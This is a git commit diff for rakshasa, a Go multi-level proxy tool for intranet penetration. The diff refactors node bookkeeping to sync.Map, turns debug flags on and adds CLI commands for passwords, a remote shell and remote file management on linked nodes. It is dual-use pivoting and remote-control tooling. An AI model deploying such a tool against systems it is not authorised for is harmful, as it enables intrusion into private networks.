优化连接逻辑,更新readme

This commit is contained in:
Mob2003
2023-04-22 19:46:52 +08:00
parent 5a67527907
commit a8dcc3871d
21 changed files with 1310 additions and 1443 deletions
+3
View File
@@ -12,10 +12,13 @@ rakshasa是一个使用Go语言编写的强大多级代理工具,专为实现*
- 控制节点,全功能节点
## 项目结构示例和截图
[点击查看更多介绍](./readme/rakshasa项目设计.md)
[win10+Proxifier实现内网穿透](./readme/rakshasa内网穿透--win10+Proxifier使用案例.md)
[rakshasa主被控设计说明](./readme/rakshasa主被控设计说明.md)
## 版本迭代
- **v0.1.0** 2023-03-28
- 首次发布
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+18 -18
View File
@@ -18,8 +18,8 @@ import (
"github.com/google/uuid"
)
var Debug bool = false
var NoPing bool = false
var Debug bool = true
var NoPing bool = true
var DebugLock bool = false
var DebugLockMap sync.Map
@@ -201,7 +201,7 @@ var msgId uint32
func (m *Msg) Marshal() []byte {
l := UUID_LEN*2 + 4 + 1 + 5 + len(m.CmdData)
data := make([]byte, l+2)
data := make([]byte, l)
data1 := make([]byte, l+2)
data1[0] = byte(l)
data1[1] = byte(l >> 8)
@@ -209,24 +209,24 @@ func (m *Msg) Marshal() []byte {
ut, _ := uuid.Parse(m.To)
bf, _ := uf.MarshalBinary()
bt, _ := ut.MarshalBinary()
copy(data[2:], bf)
copy(data[2+UUID_LEN:], bt)
b := 2 + 2*UUID_LEN
copy(data, bf)
copy(data[+UUID_LEN:], bt)
if m.MsgId == 0 { //id不为0
m.MsgId = atomic.AddUint32(&msgId, 1)
}
data[b] = byte(m.MsgId)
data[b+1] = byte(m.MsgId >> 8)
data[b+2] = byte(m.MsgId >> 16)
data[b+3] = byte(m.MsgId >> 24)
data[b+4] = m.Ttl
data[b+5] = m.CmdOpteion
data[b+6] = byte(m.CmdId)
data[b+7] = byte(m.CmdId >> 8)
data[b+8] = byte(m.CmdId >> 16)
data[b+9] = byte(m.CmdId >> 24)
copy(data[2+2*UUID_LEN+4+1+5:], m.CmdData)
aes.AesCtrEncrypt(data1[2:], data[2:])
data[2*UUID_LEN] = byte(m.MsgId)
data[2*UUID_LEN+1] = byte(m.MsgId >> 8)
data[2*UUID_LEN+2] = byte(m.MsgId >> 16)
data[2*UUID_LEN+3] = byte(m.MsgId >> 24)
data[2*UUID_LEN+4] = m.Ttl
data[2*UUID_LEN+5] = m.CmdOpteion
data[2*UUID_LEN+6] = byte(m.CmdId)
data[2*UUID_LEN+7] = byte(m.CmdId >> 8)
data[2*UUID_LEN+8] = byte(m.CmdId >> 16)
data[2*UUID_LEN+9] = byte(m.CmdId >> 24)
copy(data[2*UUID_LEN+4+1+5:], m.CmdData)
aes.AesCtrEncrypt(data1[2:], data)
return data1
}
func UnmarshalMsg(data []byte) (msg *Msg) {
+86 -103
View File
@@ -11,6 +11,7 @@ import (
"net/url"
"rakshasa_lite/aes"
"rakshasa_lite/common"
"runtime/debug"
"strconv"
"strings"
"sync"
@@ -33,13 +34,13 @@ type Conn struct {
node *node
nodeaddr string
//key string
remoteAddr string
inChan chan func()
OutChan chan []byte
close chan string
isClient bool
nodeConn *tls.Conn
regResult chan RegMsg
remoteAddr string
inChan chan func()
OutChan chan []byte
close chan string
isClient bool
nodeConn *tls.Conn
regResult chan RegMsg
}
type serverListen struct {
@@ -484,7 +485,6 @@ func (c *Conn) handlerNodeRead() {
_, err = io.ReadFull(c.nodeConn, buf)
b := aes.AesCtrDecrypt(buf)
msg := common.UnmarshalMsg(b)
if msg.To == common.NoneUUID.String() && c.node == nil {
c.inChan <- func() {
newNode := &node{
@@ -493,81 +493,75 @@ func (c *Conn) handlerNodeRead() {
newNode.do(msg)
}
} else if msg.To == currentNode.uuid {
func() {
l := clientLock.RLock()
v, ok := nodeMap[msg.From]
l.RUnlock()
if ok && v.port != 0 {
c.inChan <- func() {
v.do(msg)
v, ok := nodeMap.Load(msg.From)
if ok && v.(*node).port != 0 {
c.inChan <- func() {
v.(*node).do(msg)
}
} else {
if !ok {
newNode := &node{
uuid: msg.From,
conn: c,
waitMsg: []*common.Msg{msg},
}
} else {
l := clientLock.Lock()
v, ok := nodeMap[msg.From]
if !ok {
newNode := &node{
uuid: msg.From,
conn: c,
waitMsg: []*common.Msg{msg},
}
result := make(chan interface{}, 1)
id := newNode.storeQuery(result)
nodeMap[msg.From] = newNode
l.Unlock()
newNode.Write(common.CMD_GET_CURRENT_NODE, id, []byte{1}) //获取丢失节点的信息
go func() {
defer newNode.deleteQuery(id)
select {
case res := <-result:
if res == nil {
for _, m := range newNode.waitMsg {
c.inChan <- func() {
newNode.do(m)
}
result := make(chan interface{}, 1)
id := newNode.storeQuery(result)
nodeMap.Store(msg.From, newNode)
newNode.Write(common.CMD_GET_CURRENT_NODE, id, []byte{1}) //获取丢失节点的信息
go func() {
defer func() {
if err := recover(); err != nil {
fmt.Println(err)
debug.PrintStack()
}
newNode.deleteQuery(id)
}()
select {
case res := <-result:
if res == nil {
for _, m := range newNode.waitMsg {
c.inChan <- func() {
newNode.do(m)
}
}
case <-time.After(common.CMD_TIMEOUT):
newNode.Close("超时")
}
}()
case <-time.After(common.CMD_TIMEOUT):
newNode.Close("超时")
}
}()
} else {
if msg.CmdOpteion == common.CMD_GET_CURRENT_NODE_RESULT {
var res chan interface{}
if _v, ok := v.loadQuery(msg.CmdId); !ok {
return
} else {
res = _v
}
var nmsg nodeInfo
err = json.Unmarshal(msg.CmdData, &nmsg)
if err != nil {
res <- err
return
}
v.hostName = cert.RSADecrypterStr(nmsg.HostName)
v.uuid = cert.RSADecrypterStr(nmsg.UUID)
if v.port, err = strconv.Atoi(cert.RSADecrypterStr(nmsg.Port)); err != nil {
v.port = -1
}
v.mainIp = cert.RSADecrypterStr(nmsg.MainIp)
v.goos = cert.RSADecrypterStr(nmsg.Goos)
res <- nil
} else {
if msg.CmdOpteion == common.CMD_GET_CURRENT_NODE_RESULT {
n := v.(*node)
var res chan interface{}
if _v, ok := n.loadQuery(msg.CmdId); !ok {
return
} else {
v.waitMsg = append(v.waitMsg, msg)
res = _v
}
l.Unlock()
var nmsg nodeInfo
err = json.Unmarshal(msg.CmdData, &nmsg)
if err != nil {
res <- err
return
}
n.hostName = cert.RSADecrypterStr(nmsg.HostName)
n.uuid = cert.RSADecrypterStr(nmsg.UUID)
if n.port, err = strconv.Atoi(cert.RSADecrypterStr(nmsg.Port)); err != nil {
n.port = -1
}
n.mainIp = cert.RSADecrypterStr(nmsg.MainIp)
n.goos = cert.RSADecrypterStr(nmsg.Goos)
res <- nil
} else {
v.(*node).waitMsg = append(v.(*node).waitMsg, msg)
}
}
}()
}
} else {
@@ -605,7 +599,6 @@ func (c *Conn) handlerNodeRead() {
func (c *Conn) handle() {
c.OutChan = make(chan []byte, 64)
c.inChan = make(chan func())
c.close = make(chan string, 999)
go func() {
@@ -631,34 +624,27 @@ func (c *Conn) handle() {
c.node.ping(0)
c.node.nextPingTime = time.Now().Unix() + 5
}
func() { //返回false则退出handle
connMap.Delete(c.remoteAddr)
l := clientLock.Lock()
defer func() {
l.Unlock()
}()
connMap.Delete(c.remoteAddr)
if atomic.CompareAndSwapInt32(&c.closeTag, 0, 1) {
if c.nodeConn != nil {
c.nodeConn.Close()
}
if c.node != nil {
c.node.Close(reason)
//移除上游连接
for i := len(upLevelNode) - 1; i >= 0; i-- {
n := upLevelNode[i]
if n.uuid == c.node.uuid {
upLevelNode = append(upLevelNode[:i], upLevelNode[i+1:]...)
}
}
}
if atomic.CompareAndSwapInt32(&c.closeTag, 0, 1) {
if c.nodeConn != nil {
c.nodeConn.Close()
}
return
}()
if c.node != nil {
c.node.Close(reason)
//移除上游连接
for i := len(upLevelNode) - 1; i >= 0; i-- {
n := upLevelNode[i]
if n.uuid == c.node.uuid {
upLevelNode = append(upLevelNode[:i], upLevelNode[i+1:]...)
}
}
}
}
return
}
}
@@ -682,6 +668,7 @@ func (c *Conn) reg() error {
CmdOpteion: common.CMD_REG,
CmdData: regb,
}
if err = c.tlsWrite(msg.Marshal()); err != nil {
return err
}
@@ -689,12 +676,8 @@ func (c *Conn) reg() error {
return nil
}
func (c *Conn) WriteToUUID(msg *common.Msg) {
l := clientLock.RLock()
defer l.RUnlock()
if n, ok := nodeMap[msg.To]; ok {
n.WriteMsg(msg)
if n, ok := nodeMap.Load(msg.To); ok {
n.(*node).WriteMsg(msg)
}
}
+181 -170
View File
@@ -7,13 +7,16 @@ import (
"encoding/json"
"errors"
"fmt"
"github.com/creack/pty"
"io"
"io/ioutil"
"math/rand"
"net"
"os"
"os/exec"
"rakshasa_lite/common"
"runtime"
"runtime/debug"
"strconv"
"strings"
"sync"
@@ -21,11 +24,29 @@ import (
"time"
"unsafe"
)
var (
shellMapLock sync.Mutex
)
type StartCmdParam struct {
Param string
Size *pty.Winsize
}
type remoteCmd struct {
cmdStatus int32
cmd *exec.Cmd
id uint32
stdin io.WriteCloser
inChan chan []byte
translate func(in []byte) ([]byte, error)
ping, pong int64
}
var (
currentNode = &node{}
clientLock = &lock{}
nodeMap = make(map[string]*node)
clientLock1 = &lock{}
nodeMap sync.Map
upLevelNode []*node //上游节点
upNodeWrite = make(chan []byte, 999)
extNodeIp []string
@@ -64,14 +85,14 @@ func InitCurrentNode() {
addr: currentNode.addr,
}
currentNode.mirrorNode.mirrorNode = currentNode
nodeMap[currentNode.uuid] = currentNode
nodeMap.Store(currentNode.uuid, currentNode)
//fmt.Println("当前节点UUID", currentNode.uuid)
go func() {
for b := range upNodeWrite {
for {
ok := func() bool {
l := clientLock.Lock()
l := clientLock1.Lock()
defer l.Unlock()
if len(upLevelNode) == 0 {
@@ -91,6 +112,40 @@ func InitCurrentNode() {
nodeTickPing()
time.AfterFunc(time.Second*10, checkUpLevelNode)
}
func getNode(arg string) (n *node, err error) {
id, err := strconv.Atoi(arg)
if err == nil {
nodeMap.Range(func(key, value interface{}) bool {
_n := value.(*node)
if _n.id == id {
n = _n
return false
}
return true
})
} else {
nodeMap.Range(func(key, value interface{}) bool {
node := value.(*node)
if fmt.Sprintf("%s:%d", node.mainIp, node.port) == arg {
n = node
return false
} else if fmt.Sprintf("%s:%d", node.addr, node.port) == arg {
n = node
return false
} else if node.uuid == arg {
n = node
return false
}
return true
})
}
if n != nil {
return n, nil
} else {
return connectNew(arg)
}
}
func checkUpLevelNode() {
if len(currentConfig.DstNode) > 0 && len(upLevelNode) == 0 {
@@ -108,29 +163,18 @@ func checkUpLevelNode() {
return
}
}
func() {
l := clientLock.RLock()
defer l.RUnlock()
for _, n := range nodeMap {
if n.uuid != currentNode.uuid {
func() {
l.RUnlock()
defer clientLock.RLock(l)
if len(n.mainIp) == 0 {
getNode(fmt.Sprintf("%s:%d", n.addr, n.port))
}
}()
if len(upLevelNode) > 0 {
return
}
nodeMap.Range(func(key, value interface{}) bool {
n := value.(*node)
if n.uuid != currentNode.uuid {
if len(n.mainIp) == 0 {
getNode(fmt.Sprintf("%s:%d", n.addr, n.port))
}
if len(upLevelNode) > 0 {
return false
}
}
}()
return true
})
}
}
@@ -138,12 +182,9 @@ func checkUpLevelNode() {
time.AfterFunc(time.Second*5, checkUpLevelNode)
}
func nodeTickPing() {
l := clientLock.RLock()
defer l.RUnlock()
now := time.Now().Unix()
for _, n := range nodeMap {
nodeMap.Range(func(key, value interface{}) bool {
n := value.(*node)
if n.uuid != currentNode.uuid {
if n.mainIp != "" {
addr1 := fmt.Sprintf("%s:%d", n.mainIp, n.port)
@@ -167,8 +208,8 @@ func nodeTickPing() {
}
}
}
return true
})
time.AfterFunc(time.Second*1, nodeTickPing)
}
@@ -278,29 +319,28 @@ func connectNew(addr string) (n *node, e error) {
}
n.mainIp = cert.RSADecrypterStr(regmsg.MainIp)
if n.port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); err != nil {
if n.port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); n.port==0 {
n.port = -1
}
if v, ok := nodeMap[regmsg.UUID]; ok {
if v.conn.node != nil && v.conn.node.uuid == regmsg.UUID && v.conn.closeTag == 0 {
if v, ok := nodeMap.Load(regmsg.UUID); ok {
if v.(*node).conn.node != nil && v.(*node).conn.node.uuid == regmsg.UUID && v.(*node).conn.closeTag == 0 {
n.uuid = "" //清空uuid避免正常的node被删
n.conn.Close("重复注册") //当前的连接关掉
n.conn = v.conn
v.mainIp = cert.RSADecrypterStr(regmsg.MainIp)
if v.port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); err != nil {
v.port = -1
v.(*node).mainIp = cert.RSADecrypterStr(regmsg.MainIp)
if v.(*node).port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); v.(*node).port==0 {
v.(*node).port = -1
}
n = v
n = v.(*node)
} else {
n.conn.node = n
}
} else {
n.conn.node = n
}
nodeMap[n.uuid] = n
nodeMap.Store(n.uuid, n)
n.reConnectAddrs = []string{addr}
n.Write(common.CMD_GET_NODE, 0, nil)
return n, nil
case <-time.After(time.Second * 10):
return nil, errors.New("time out")
@@ -340,7 +380,6 @@ func (n *node) WriteMsg(msg *common.Msg) {
func (n *node) do(msg *common.Msg) {
var err error
//fmt.Println(common.CmdToName[msg.CmdOpteion])
switch msg.CmdOpteion {
case common.CMD_CONNECT_BYIDADDR:
msg.CmdData = cert.RSADecrypterByPubByte(msg.CmdData)
@@ -436,57 +475,50 @@ func (n *node) do(msg *common.Msg) {
}
case common.CMD_REG:
func() {
l := clientLock.Lock()
defer l.Unlock()
var regmsg RegMsg
err = json.Unmarshal(msg.CmdData, &regmsg)
if err != nil {
regmsg.Err = err.Error()
b, _ := json.Marshal(regmsg)
n.Write(common.CMD_REG_RESULT, 0, b)
return
}
uuid := regmsg.UUID
if uuid == currentNode.uuid {
regmsg.Err = "不能连接自己"
b, _ := json.Marshal(regmsg)
n.Write(common.CMD_REG_RESULT, 0, b)
return
}
n.hostName = cert.RSADecrypterStr(regmsg.Hostname)
n.mainIp = cert.RSADecrypterStr(regmsg.MainIp)
if n.port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); err != nil {
n.port = -1
}
n.goos = cert.RSADecrypterStr(regmsg.Goos)
n.addr = n.conn.nodeConn.RemoteAddr().String()
if i := strings.Index(n.addr, ":"); i > -1 {
n.addr = n.addr[:i]
}
resultMsg := regmsg
resultMsg.UUID = currentNode.uuid
resultMsg.Hostname = cert.RSAEncrypterStr(currentNode.hostName)
resultMsg.MainIp = cert.RSAEncrypterStr(currentNode.mainIp)
resultMsg.Port = cert.RSAEncrypterStr(strconv.Itoa(currentNode.port))
resultMsg.Goos = cert.RSAEncrypterStr(currentNode.goos)
b, _ := json.Marshal(resultMsg)
//返回成功结果
var regmsg RegMsg
err = json.Unmarshal(msg.CmdData, &regmsg)
if err != nil {
regmsg.Err = err.Error()
b, _ := json.Marshal(regmsg)
n.Write(common.CMD_REG_RESULT, 0, b)
//储存节点
n.uuid = uuid
if v, ok := nodeMap[uuid]; !ok || v.conn.closeTag > 0 {
n.conn.node = n
nodeMap[regmsg.UUID] = n
return
}
uuid := regmsg.UUID
if uuid == currentNode.uuid {
regmsg.Err = "请求的UUID相同,无法连接自己,请将节点设置为不同的UUID"
b, _ := json.Marshal(regmsg)
n.Write(common.CMD_REG_RESULT, 0, b)
return
}
}
currentNode.broadcastNode()
//把本机所有节点同步到注册机器
go n.writeGetNodeResult(msg.CmdId)
}()
n.hostName = cert.RSADecrypterStr(regmsg.Hostname)
n.mainIp = cert.RSADecrypterStr(regmsg.MainIp)
if n.port, err = strconv.Atoi(cert.RSADecrypterStr(regmsg.Port)); err != nil {
n.port = -1
}
n.goos = cert.RSADecrypterStr(regmsg.Goos)
n.addr = n.conn.nodeConn.RemoteAddr().String()
if i := strings.Index(n.addr, ":"); i > -1 {
n.addr = n.addr[:i]
}
resultMsg := regmsg
resultMsg.UUID = currentNode.uuid
resultMsg.Hostname = cert.RSAEncrypterStr(currentNode.hostName)
resultMsg.MainIp = cert.RSAEncrypterStr(currentNode.mainIp)
resultMsg.Port = cert.RSAEncrypterStr(strconv.Itoa(currentNode.port))
resultMsg.Goos = cert.RSAEncrypterStr(currentNode.goos)
b, _ := json.Marshal(resultMsg)
//返回成功结果
n.Write(common.CMD_REG_RESULT, 0, b)
//储存节点
n.uuid = uuid
if v, ok := nodeMap.Load(uuid); !ok || v.(*node).conn.closeTag > 0 {
n.conn.node = n
nodeMap.Store(regmsg.UUID, n)
}
currentNode.broadcastNode()
case common.CMD_REG_RESULT:
var regmsg RegMsg
err = json.Unmarshal(msg.CmdData, &regmsg)
@@ -501,7 +533,7 @@ func (n *node) do(msg *common.Msg) {
}
//交换节点
go n.writeGetNodeResult(msg.CmdId)
n.writeGetNodeResult(msg.CmdId)
case common.CMD_REMOTE_REG:
var regmsg RegMsg
@@ -549,10 +581,9 @@ func (n *node) do(msg *common.Msg) {
v <- errors.New(regmsg.Err)
return
}
l := clientLock.Lock()
if n.uuid != regmsg.UUID {
var targetNode *node
if targetNode, ok = nodeMap[regmsg.UUID]; !ok {
if _v, ok := nodeMap.Load(regmsg.UUID); !ok {
targetNode = getNewNode(nodeInfo{
UUID: regmsg.UUID,
HostName: cert.RSADecrypterStr(regmsg.Hostname),
@@ -561,8 +592,9 @@ func (n *node) do(msg *common.Msg) {
Goos: cert.RSADecrypterStr(regmsg.Goos),
}, n)
nodeMap[regmsg.UUID] = targetNode
nodeMap.Store(regmsg.UUID, targetNode)
} else {
targetNode = _v.(*node)
targetNode.updateNode(nodeInfo{
UUID: regmsg.UUID,
HostName: cert.RSADecrypterStr(regmsg.Hostname),
@@ -575,8 +607,6 @@ func (n *node) do(msg *common.Msg) {
} else {
v <- n
}
l.Unlock()
n.writeGetNodeResult(msg.CmdId)
case common.CMD_PING:
@@ -769,9 +799,6 @@ func (n *node) do(msg *common.Msg) {
case common.CMD_GET_NODE:
n.writeGetNodeResult(msg.CmdId)
case common.CMD_GET_NODE_RESULT:
l := clientLock.Lock()
defer l.Unlock()
var s []nodeInfo
err = json.Unmarshal(msg.CmdData, &s)
if err == nil {
@@ -784,12 +811,12 @@ func (n *node) do(msg *common.Msg) {
Goos: cert.RSADecrypterStr(_n.Goos),
}
if _n.UUID != currentNode.uuid {
if v, ok := nodeMap[_n.UUID]; !ok {
nodeMap[_n.UUID] = getNewNode(_n, n)
if v, ok := nodeMap.Load(_n.UUID); !ok {
nodeMap.Store(_n.UUID, getNewNode(_n, n))
} else {
v.hostName = _n.HostName
v.mainIp = _n.MainIp
v.port, _ = strconv.Atoi(_n.Port)
v.(*node).hostName = _n.HostName
v.(*node).mainIp = _n.MainIp
v.(*node).port, _ = strconv.Atoi(_n.Port)
}
}
@@ -817,31 +844,27 @@ func (n *node) do(msg *common.Msg) {
case common.CMD_ADD_NODE:
var nmsg nodeInfo
err = json.Unmarshal(msg.CmdData, &nmsg)
if err != nil {
return
}
l := clientLock.Lock()
defer l.Unlock()
if v, ok := nodeMap[nmsg.UUID]; !ok {
if v, ok := nodeMap.Load(nmsg.UUID); !ok {
newNode := getNewNode(nmsg, n)
nodeMap[nmsg.UUID] = newNode
nodeMap.Store(nmsg.UUID, newNode)
} else if nmsg.UUID != currentNode.uuid {
n := v.(*node)
port, err := strconv.Atoi(cert.RSADecrypterStr(nmsg.Port))
if err == nil {
v.port = port
n.port = port
} else {
v.port = -1
n.port = -1
}
v.mainIp = cert.RSADecrypterStr(nmsg.MainIp)
v.hostName = cert.RSADecrypterStr(nmsg.HostName)
v.goos = cert.RSADecrypterStr(nmsg.Goos)
v.uuid = nmsg.UUID
nodeMap[nmsg.UUID] = v
n.mainIp = cert.RSADecrypterStr(nmsg.MainIp)
n.hostName = cert.RSADecrypterStr(nmsg.HostName)
n.goos = cert.RSADecrypterStr(nmsg.Goos)
n.uuid = nmsg.UUID
nodeMap.Store(nmsg.UUID, n)
}
case common.CMD_DIR:
@@ -1206,34 +1229,21 @@ func getNewNode(m nodeInfo, n *node) *node {
func allNodesDo(f func(*node) (bool, error)) (err error) {
var ok bool
l := clientLock.RLock()
defer l.RUnlock()
for _, n := range nodeMap {
nodeMap.Range(func(key, value interface{}) bool {
n := value.(*node)
if n.uuid != currentNode.uuid {
func() {
l.RUnlock()
defer clientLock.RLock(l)
ok, err = f(n)
}()
if err != nil {
return err
}
if !ok {
break
ok, err = f(n)
if err != nil || !ok {
return false
}
}
}
return nil
return true
})
return err
}
func (n *node) ping(id uint32) {
l := clientLock.Lock()
defer func() {
l.Unlock()
}()
l := clientLock1.Lock()
defer l.Unlock()
now := time.Now()
if n.pingTime > n.pongTime {
@@ -1293,12 +1303,7 @@ func (n *node) ping(id uint32) {
func (n *node) Delete(reason string) {
go func() {
if atomic.CompareAndSwapInt32(&n.isClose, 0, 1) {
l := clientLock.Lock()
_, ok := nodeMap[n.uuid]
if ok {
delete(nodeMap, n.uuid)
}
l.Unlock()
n.connMap.Range(func(key, value interface{}) bool {
if v, ok := value.(common.Conn); ok {
v.Close(reason)
@@ -1329,6 +1334,7 @@ func (n *node) Delete(reason string) {
n.shellMap.Delete(key)
return true
})
nodeMap.Delete(n.uuid)
}
}()
@@ -1424,27 +1430,32 @@ func (n *node) storeConn(v common.Conn) (newID uint32) {
}
func (n *node) writeGetNodeResult(id uint32) {
l := clientLock.RLock()
go func() {
defer func() {
if err := recover(); err != nil {
fmt.Println(err)
debug.PrintStack()
}
}()
var s []*nodeInfo
nodeMap.Range(func(key, value interface{}) bool {
_n := value.(*node)
if _n.uuid != currentNode.uuid {
s = append(s, &nodeInfo{
UUID: _n.uuid,
HostName: cert.RSAEncrypterStr(_n.hostName),
MainIp: cert.RSAEncrypterStr(_n.mainIp),
Port: cert.RSAEncrypterStr(strconv.Itoa(_n.port)),
Goos: cert.RSAEncrypterStr(_n.goos),
})
}
return true
})
defer l.RUnlock()
b, _ := json.Marshal(s)
n.Write(common.CMD_GET_NODE_RESULT, id, b)
}()
var s []*nodeInfo
for _, _n := range nodeMap {
if _n.uuid != currentNode.uuid {
s = append(s, &nodeInfo{
UUID: _n.uuid,
HostName: cert.RSAEncrypterStr(_n.hostName),
MainIp: cert.RSAEncrypterStr(_n.mainIp),
Port: cert.RSAEncrypterStr(strconv.Itoa(_n.port)),
Goos: cert.RSAEncrypterStr(_n.goos),
})
}
}
b, _ := json.Marshal(s)
n.Write(common.CMD_GET_NODE_RESULT, id, b)
}
func (n *node) updateNode(msg nodeInfo) {
n.hostName = msg.HostName
-77
View File
@@ -1,77 +0,0 @@
package server
/*
*高级shell功能
*node节点管理、remoteShell远程shellconfig配置管理
*/
import (
"github.com/creack/pty"
"io"
"os/exec"
"strconv"
"strings"
"sync"
)
var (
shellMapLock sync.Mutex
)
type StartCmdParam struct {
Param string
Size *pty.Winsize
}
type remoteCmd struct {
cmdStatus int32
cmd *exec.Cmd
id uint32
stdin io.WriteCloser
inChan chan []byte
translate func(in []byte) ([]byte, error)
ping, pong int64
}
func getRealPath(path string) string {
path_s := strings.Split(path, "/")
realpath := []string{}
if len(path_s) == 0 {
return "error"
}
for _, value := range path_s {
if value == ".." {
k := len(realpath)
kk := k - 1
realpath = append(realpath[:kk], realpath[k:]...)
} else {
realpath = append(realpath, value)
}
}
return strings.Join(realpath, "/")
}
func getNode(arg string) (*node, error) {
l := clientLock.RLock()
id, err := strconv.Atoi(arg)
if err == nil {
for _, n := range nodeMap {
if n.id == id && n.uuid != currentNode.uuid {
l.RUnlock()
return n, nil
}
}
} else {
if v, ok := nodeMap[arg]; ok && v.uuid != currentNode.uuid {
l.RUnlock()
return v, nil
}
}
l.RUnlock()
return connectNew(arg)
}
+781 -4
View File
@@ -1,11 +1,27 @@
package server
import (
"bytes"
"cert"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"os"
"rakshasa/aes"
"rakshasa/common"
"regexp"
"runtime"
"strconv"
"strings"
"sync/atomic"
"time"
"github.com/abiosoft/readline"
"github.com/google/uuid"
"github.com/luyu6056/ishell"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
)
var rootCli = cliInit()
@@ -99,9 +115,9 @@ func cliInit() *ishell.Shell {
c.Println("参数不对")
return
}
n, ok := nodeMap[c.Args[0]]
n, ok := nodeMap.Load(c.Args[0])
if ok {
n.Delete("")
n.(*node).Delete("")
}
},
@@ -116,9 +132,9 @@ func cliInit() *ishell.Shell {
c.Println("参数不对")
return
}
n, ok := nodeMap[c.Args[0]]
n, ok := nodeMap.Load(c.Args[0])
if ok {
n.Close("debug关闭")
n.(*node).Close("debug关闭")
}
},
@@ -126,3 +142,764 @@ func cliInit() *ishell.Shell {
}
return shell
}
func init() {
configShell := cliInit()
configShell.SetPrompt("rakshasa\\config>")
configShell.AddCmd(&ishell.Cmd{
Name: "info",
Help: "打印当前配置",
Func: func(c *ishell.Context) {
c.Println("当前节点", currentNode.uuid)
c.Println("上级节点地址", currentConfig.DstNode)
c.Println("通讯密码", currentConfig.Password)
c.Println("监听端口", currentConfig.Port)
c.Println("监听IP", currentConfig.ListenIp)
c.Println("禁止额外连接", currentConfig.Limit)
c.Println("配置文件名", currentConfig.FileName)
if currentConfig.FileSave {
c.Println("当前配置:已写入文件")
} else {
c.Println("当前配置:未写入文件")
}
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "save",
Help: "保存文件",
Func: func(c *ishell.Context) {
if err := ConfigSave(); err == nil {
c.Println("写入成功")
} else {
c.Println("保存失败", err.Error())
}
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "d",
Help: "修改上级节点地址,格式为 ip:端口 多个节点以,隔开 注意:不会立刻连接设置节点, 当发生 节点掉线重连 时候会连接该地址",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误,格式为 ip:端口 多个节点以,隔开 如 d 192.168.1.1:8883,192.168.1.2:8883")
return
}
dstNode, err := common.ResolveTCPAddr(c.Args[0])
if err != nil {
c.Println("参数错误,格式为 ip:端口 多个节点以,隔开 如 d 192.168.1.1:8883,192.168.1.2:8883")
return
}
currentConfig.DstNode = dstNode
currentConfig.FileSave = false
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "password",
Help: "修改通讯密码,立即生效",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误,格式为 password \"123456\"")
return
}
c.Println(c.Args)
currentConfig.Password = c.Args[0]
currentConfig.FileSave = false
aes.Key = aes.MD5_B(currentConfig.Password + string(cert.RsaPrivateKey[:16]))
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "port",
Help: "修改监听端口,立即生效",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误,格式为 port 8883")
return
}
port, _ := strconv.Atoi(c.Args[0])
if port <= 0 || port > 65535 {
c.Println("参数错误,端口范围是1-65535")
return
}
c.Println("正在关闭server监听")
if currentNode.listen != nil {
currentNode.listen.Close()
currentNode.listen = nil
}
currentConfig.Port = port
currentNode.port = port
currentConfig.FileSave = false
if err := StartServer(fmt.Sprintf(":%d", currentConfig.Port)); err != nil {
c.Printf("启动节点失败 %v, 请重新修改监听端口", currentConfig.Port)
}
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "ip",
Help: "修改本节点连接ip,当其他节点进行额外连接时候,优先使用此ip连接",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
currentConfig.ListenIp = c.Args[0]
currentNode.mainIp = currentConfig.ListenIp
currentConfig.FileSave = false
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "limit",
Help: "修改本节点Limit设置,使用方法 limit true",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
currentConfig.Limit = c.Args[0] == "true"
currentConfig.FileSave = false
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "f",
Help: "修改配置文件名,使用方法 f config.yaml",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
currentConfig.FileName = c.Args[0]
currentConfig.FileSave = false
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "uuid",
Help: "修改本节点UUID设置,使用方法uuid 字串符",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
if id, err := uuid.Parse(c.Args[0]); err == nil {
nodeMap.Delete(currentConfig.UUID)
currentConfig.UUID = id.String()
nodeMap.Store(currentConfig.UUID, currentNode)
currentConfig.FileSave = false
SetConfig(currentConfig)
} else {
c.Println("输入的uuid不是合法的uuid,建议使用xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx")
}
},
})
rootCli.AddCmd(&ishell.Cmd{
Name: "config",
Help: "配置管理",
Func: func(c *ishell.Context) {
configShell.Run()
},
})
remoteShell := cliInit()
remoteShell.SetPrompt("rakshasa\\remoteshell>")
fileShell := cliInit()
remoteShell.AddCmd(&ishell.Cmd{
Name: "file",
Help: "连到节点进行文件管理,参数为id或者uuid",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
workN, _ := getNode(c.Args[0])
if workN == nil {
c.Println("无法连接节点", c.Args[0])
return
}
if workN != nil {
fileShell.Set("node", workN)
result := make(chan interface{}, 1)
id := workN.storeQuery(result)
workN.Write(common.CMD_PWD, id, []byte(cert.RSAEncrypterByPriv(currentConfig.Password)))
select {
case pwd := <-result:
workN.deleteQuery(id)
pwd = strings.ReplaceAll(pwd.(string), "\\", "/")
fileShell.Set("pwd", pwd)
fileShell.SetPrompt(workN.uuid + " " + pwd.(string) + ">")
fileShell.Run()
case <-time.After(common.CMD_TIMEOUT):
workN.deleteQuery(id)
